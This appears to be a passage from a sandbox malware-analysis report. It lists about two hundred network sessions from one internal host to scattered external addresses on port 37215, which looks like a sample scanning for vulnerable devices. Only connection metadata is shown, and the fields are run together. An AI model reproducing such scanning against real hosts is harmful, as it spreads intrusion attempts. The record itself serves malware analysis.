                                                  7200192.168.2.1342906197.27.233.13237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7201192.168.2.1344632157.84.208.18837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7202192.168.2.1335622197.46.243.13837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7203192.168.2.134634041.199.143.22937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7204192.168.2.133603041.176.43.12937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7205192.168.2.135993441.231.33.22337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7206192.168.2.1348166197.185.57.7037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7207192.168.2.1360480157.152.41.15537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7208192.168.2.1343340157.196.60.9737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7209192.168.2.1352056197.128.64.16537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7210192.168.2.1342320194.45.110.13137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7211192.168.2.135968638.137.6.19537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7212192.168.2.134649241.92.61.2737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7213192.168.2.135705041.151.130.937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7214192.168.2.134964841.94.145.6937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7215192.168.2.1337224193.156.71.12237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7216192.168.2.1352448197.50.197.14137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7217192.168.2.1358040138.246.251.6837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7218192.168.2.1352686197.98.167.11737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7219192.168.2.1342188147.113.228.19137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7220192.168.2.1355522157.1.178.12837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7221192.168.2.134968241.148.230.237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7222192.168.2.1345720164.113.14.17937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7223192.168.2.134819685.173.139.4837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7224192.168.2.133854041.251.110.8537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7225192.168.2.135394653.62.114.1737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7226192.168.2.1358704210.253.197.11237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7227192.168.2.1334818157.5.200.20437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7228192.168.2.1347138157.61.124.7237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7229192.168.2.1357492197.154.123.24337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7230192.168.2.1359792157.217.95.14337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7231192.168.2.1340482157.228.255.9437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7232192.168.2.1357830197.101.85.21637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7233192.168.2.1340106206.65.179.13637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7234192.168.2.1340374157.22.179.19837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7235192.168.2.1336936197.123.15.24437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7236192.168.2.133381841.51.166.14037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7237192.168.2.1332966142.251.28.20837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7238192.168.2.1340238197.70.62.15537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7239192.168.2.1350620200.98.50.14937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7240192.168.2.135616241.47.29.11437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7241192.168.2.1336828157.157.233.21937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7242192.168.2.1336686197.80.242.3937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7243192.168.2.136015234.71.98.19037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7244192.168.2.1344124197.245.151.18137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7245192.168.2.1355814116.218.63.15837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7246192.168.2.133438241.42.66.4737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7247192.168.2.1349072157.80.23.17637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7248192.168.2.1345756157.198.63.14737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7249192.168.2.134507641.170.209.4737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7250192.168.2.1338098157.209.0.737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7251192.168.2.135828641.25.135.12537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7252192.168.2.134531641.124.151.10837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7253192.168.2.1340800181.233.57.5937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7254192.168.2.1355860207.30.1.25037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7255192.168.2.134044487.89.32.18237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7256192.168.2.134139244.141.192.20337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7257192.168.2.1340624197.24.3.14237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7258192.168.2.134348076.30.69.18137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7259192.168.2.13478762.53.105.6237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7260192.168.2.134432841.215.126.25337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7261192.168.2.1335972157.218.181.12737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7262192.168.2.1345348197.210.206.13337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7263192.168.2.134924641.221.82.12037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7264192.168.2.1347090157.246.251.3137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7265192.168.2.133820641.186.21.15137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7266192.168.2.1338518203.192.124.14937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7267192.168.2.1350248157.176.46.5237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7268192.168.2.1347442159.45.50.12437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7269192.168.2.1344446157.236.5.9237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7270192.168.2.135501641.183.243.6337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7271192.168.2.1348886197.5.117.19937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7272192.168.2.1338298157.221.107.2537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7273192.168.2.133640868.11.31.10637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7274192.168.2.134278841.201.96.5837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7275192.168.2.1336874201.243.108.837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7276192.168.2.1338542157.235.16.21037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7277192.168.2.1350332157.3.97.2037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7278192.168.2.133653841.121.196.23737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7279192.168.2.135880641.119.42.23837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7280192.168.2.1334818157.8.234.6737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7281192.168.2.1355936157.37.95.5337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7282192.168.2.1359764197.122.99.15437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7283192.168.2.1337102157.242.203.20637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7284192.168.2.134386041.178.117.20037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7285192.168.2.1343902197.131.137.6637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7286192.168.2.1339954212.225.85.7537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7287192.168.2.1351886197.148.52.20137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7288192.168.2.134023242.243.34.21337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7289192.168.2.1357440172.8.176.25337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7290192.168.2.1355710157.173.236.22437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7291192.168.2.1354942197.49.183.17737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7292192.168.2.1336128157.159.96.9537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7293192.168.2.1356710157.35.208.14837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7294192.168.2.1347842157.21.165.12837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7295192.168.2.133414841.75.244.10937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7296192.168.2.1360958197.15.60.15637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7297192.168.2.135909041.140.192.19237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7298192.168.2.135611825.198.238.9637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7299192.168.2.1339710157.136.147.24837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7300192.168.2.1350518104.35.177.18137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7301192.168.2.1345050157.41.134.16637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7302192.168.2.135065041.110.252.1837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7303192.168.2.1345766157.193.155.337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7304192.168.2.1359080157.86.237.18137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7305192.168.2.1345288157.28.120.18337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7306192.168.2.135998841.125.129.13737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7307192.168.2.133778641.127.49.10737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7308192.168.2.1349578197.15.231.15537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7309192.168.2.1339952197.9.231.2637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7310192.168.2.1345424197.221.161.9137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7311192.168.2.1349810157.207.209.21237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7312192.168.2.134340441.153.50.12337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7313192.168.2.1341824157.33.141.4337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7314192.168.2.1344556157.243.56.21337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7315192.168.2.1358814197.239.117.12937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7316192.168.2.1349556157.209.34.8137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7317192.168.2.1353748165.92.208.21637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7318192.168.2.1350486151.152.104.4137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7319192.168.2.1357374157.164.42.5637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7320192.168.2.1359312197.212.160.8837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7321192.168.2.134456441.27.116.6337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7322192.168.2.135780841.198.78.19137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7323192.168.2.1341198157.28.169.3737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7324192.168.2.1344240197.147.207.7937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7325192.168.2.134365441.93.101.9437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7326192.168.2.135252684.130.205.25037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7327192.168.2.1338770134.210.24.19937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7328192.168.2.1339952172.81.128.25437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7329192.168.2.1339472197.166.44.12537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7330192.168.2.1344484157.91.223.12937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7331192.168.2.135683641.125.251.7837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7332192.168.2.134021224.88.80.2137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7333192.168.2.134902641.4.33.9637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7334192.168.2.1352312157.66.254.11937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7335192.168.2.135957041.26.45.24237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7336192.168.2.1359612197.85.113.3737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7337192.168.2.1338820157.161.31.15237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7338192.168.2.1351992197.113.101.11737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7339192.168.2.1343210197.82.168.25537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7340192.168.2.1360064197.161.34.537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7341192.168.2.134612441.245.129.24237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7342192.168.2.1351922157.95.248.937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7343192.168.2.1341022157.160.44.20937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7344192.168.2.133635064.73.150.10737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7345192.168.2.1358122197.73.89.16837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7346192.168.2.133517041.209.76.15037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7347192.168.2.133974897.25.217.16237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7348192.168.2.1340550157.128.184.24637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7349192.168.2.1335670157.124.97.9737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7350192.168.2.1335312197.3.41.8437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7351192.168.2.133712841.71.193.9437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7352192.168.2.1342836197.144.34.15837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7353192.168.2.1344218197.237.164.25037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7354192.168.2.133578241.32.199.24137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7355192.168.2.1333932157.240.17.8237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7356192.168.2.1350092197.251.149.5637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7357192.168.2.133303841.123.117.1437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7358192.168.2.1348842157.220.66.15837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7359192.168.2.1333256197.124.232.19537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7360192.168.2.134241441.42.99.19437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7361192.168.2.1345510216.140.7.8237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7362192.168.2.134667088.16.167.037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7363192.168.2.133912241.116.95.11837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7364192.168.2.1344230197.170.114.14937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7365192.168.2.1334816205.21.159.5737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7366192.168.2.1355410197.37.168.7137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7367192.168.2.1341378113.122.141.15037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7368192.168.2.1341780197.45.169.2737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7369192.168.2.1333354157.36.45.20837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7370192.168.2.134384241.60.120.7637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7371192.168.2.135559241.194.20.24137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7372192.168.2.134845441.125.185.21037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7373192.168.2.1350486197.22.44.21137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7374192.168.2.134162041.111.209.1237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7375192.168.2.1341680157.55.53.7437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7376192.168.2.135705441.205.224.15537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7377192.168.2.1338298197.223.84.22537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7378192.168.2.1339722197.125.250.7337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7379192.168.2.135416241.93.211.20937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7380192.168.2.1346448197.223.195.2437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7381192.168.2.1340778197.118.25.6737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7382192.168.2.1353794197.232.55.20137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7383192.168.2.133530219.175.67.15637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7384192.168.2.134122241.91.39.1437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7385192.168.2.135104641.99.209.5637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7386192.168.2.1347794197.222.39.3437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7387192.168.2.1343186157.228.171.9137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7388192.168.2.1355388197.78.8.11737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7389192.168.2.133814041.42.70.2537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7390192.168.2.1340304207.156.34.3137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7391192.168.2.133884441.43.68.12837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7392192.168.2.1334940197.80.76.8937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7393192.168.2.135388441.13.22.2737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7394192.168.2.135210241.193.219.537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7395192.168.2.134738062.49.188.11537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7396192.168.2.1334944157.134.35.10737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7397192.168.2.1342162151.162.251.13037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7398192.168.2.1356044197.33.154.8337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7399192.168.2.135418887.40.189.4337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7400192.168.2.1360688157.162.69.15437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7401192.168.2.136035241.165.143.11237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7402192.168.2.1355342197.202.186.037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7403192.168.2.1347728197.1.172.16737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7404192.168.2.135795441.99.72.20937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7405192.168.2.135566463.246.22.12637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7406192.168.2.1334204157.177.56.21337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7407192.168.2.1346664197.104.98.20637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7408192.168.2.135610041.237.132.16737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7409192.168.2.134075441.223.17.24537215
